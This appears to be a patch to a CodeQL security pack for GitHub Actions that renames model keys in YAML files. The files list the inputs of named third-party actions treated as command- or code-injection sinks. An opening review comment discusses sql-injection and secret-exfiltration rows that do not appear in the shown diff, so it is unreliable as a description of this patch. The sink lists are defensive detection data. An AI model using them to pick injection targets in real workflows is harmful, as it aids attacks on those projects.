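Review bot: The two `dailydotdev/action-devcard` sink rows label `input.commit_branch` and `input.commit_filename` as `sql-injection`, while every other sink row visible in this part of the patch uses `command-injection`, `code-injection` or `secret-exfiltration`. A branch name and a file name are unlikely to end up in a SQL statement, so the kind may be a slip. If no query selects sinks of kind `sql-injection`, these two rows never produce an alert. If the inputs reach a shell command, the rows should use the same kind as the rest, e.g. `- ["dailydotdev/action-devcard", "*", "input.commit_branch", "command-injection", "manual"]`, and likewise for `commit_filename`. The file may continue past this hunk.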
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index afe3e82ca1f..11f1f10980f 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 5b0a9dab38d..9ed2cb7908b 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 35bbd72f0a4..7f279f37a45 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 472778d33b4..68f434f4797 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml 
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 1647e560730..890a47c79fc 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index bbdad8287dd..aff5c330316 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index f3ac66006d9..8f5e22fa2d9 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 9189245e228..ff0131da99e 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index bd64fc37423..1d82fb8f836 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 9a20279e110..1e4cc21dd13 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] 
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 8d06bc8a512..ba729868a04 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 9d066ac23ec..504f0693977 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 71d83774231..48267b6d082 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 563da9d4c0f..26eea1d2341 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml 
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 5194ce500fb..7993d827fa6 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 8c2f32627d9..de48ea5a709 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index f74ae81a52c..36a9b24f089 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 877543ea8e4..f04f8dda6c8 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 1c9d4a7f6d9..a37d6452d50 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index a9d65724735..352eb51996a 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index d40014b9a12..44f34c11cb3 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 7452ddc2187..3fd2e46296a 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index a91d2c7b0e5..881374b6c90 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 95b5ba13ad1..6d77c866dc2 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 7157e1bea48..0b27c584584 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index a3f43d524b4..911d3e57155 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 6e0d980943a..1ac668cf55a 100644 
--- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index ef682ff4fff..5cf121dcef2 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 7ce84599d17..d946204e9b9 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 47f1c83016f..c6839a7b004 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 54353368db2..9e708bbcc89 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 119115c1560..cfb67540b17 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 762623ed27e..7186433e6d2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index 2272d7ff8e6..d39aafe162f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 3537169892a..a3b53b3ec96 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index dfac696dddf..2a35d22a10e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] - ["apache/flink", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 2e28ad9e900..156d244ece2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 5c82922c35e..fcda4b3dfec 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index d618f7b761f..84877f57d8c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index c49315d791a..dcb93d013a0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f58fcf336fc..4776bb79067 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 4812eaa5b4a..2540e6a76ca 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index de8c3e1b725..525064de6a9 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index dee268884a1..b46d5a3ee6a 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 5e0e5158390..631457c813e 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index bb4b41a0592..44d9eb10a0d 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index ef3a84762db..0d7f80698f5 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 425242bf220..84caa043484 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 62f1ed005ed..f6aed253a21 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 098b460bbd8..1eac49617f2 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index d5a257be220..1efa6815c28 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml 
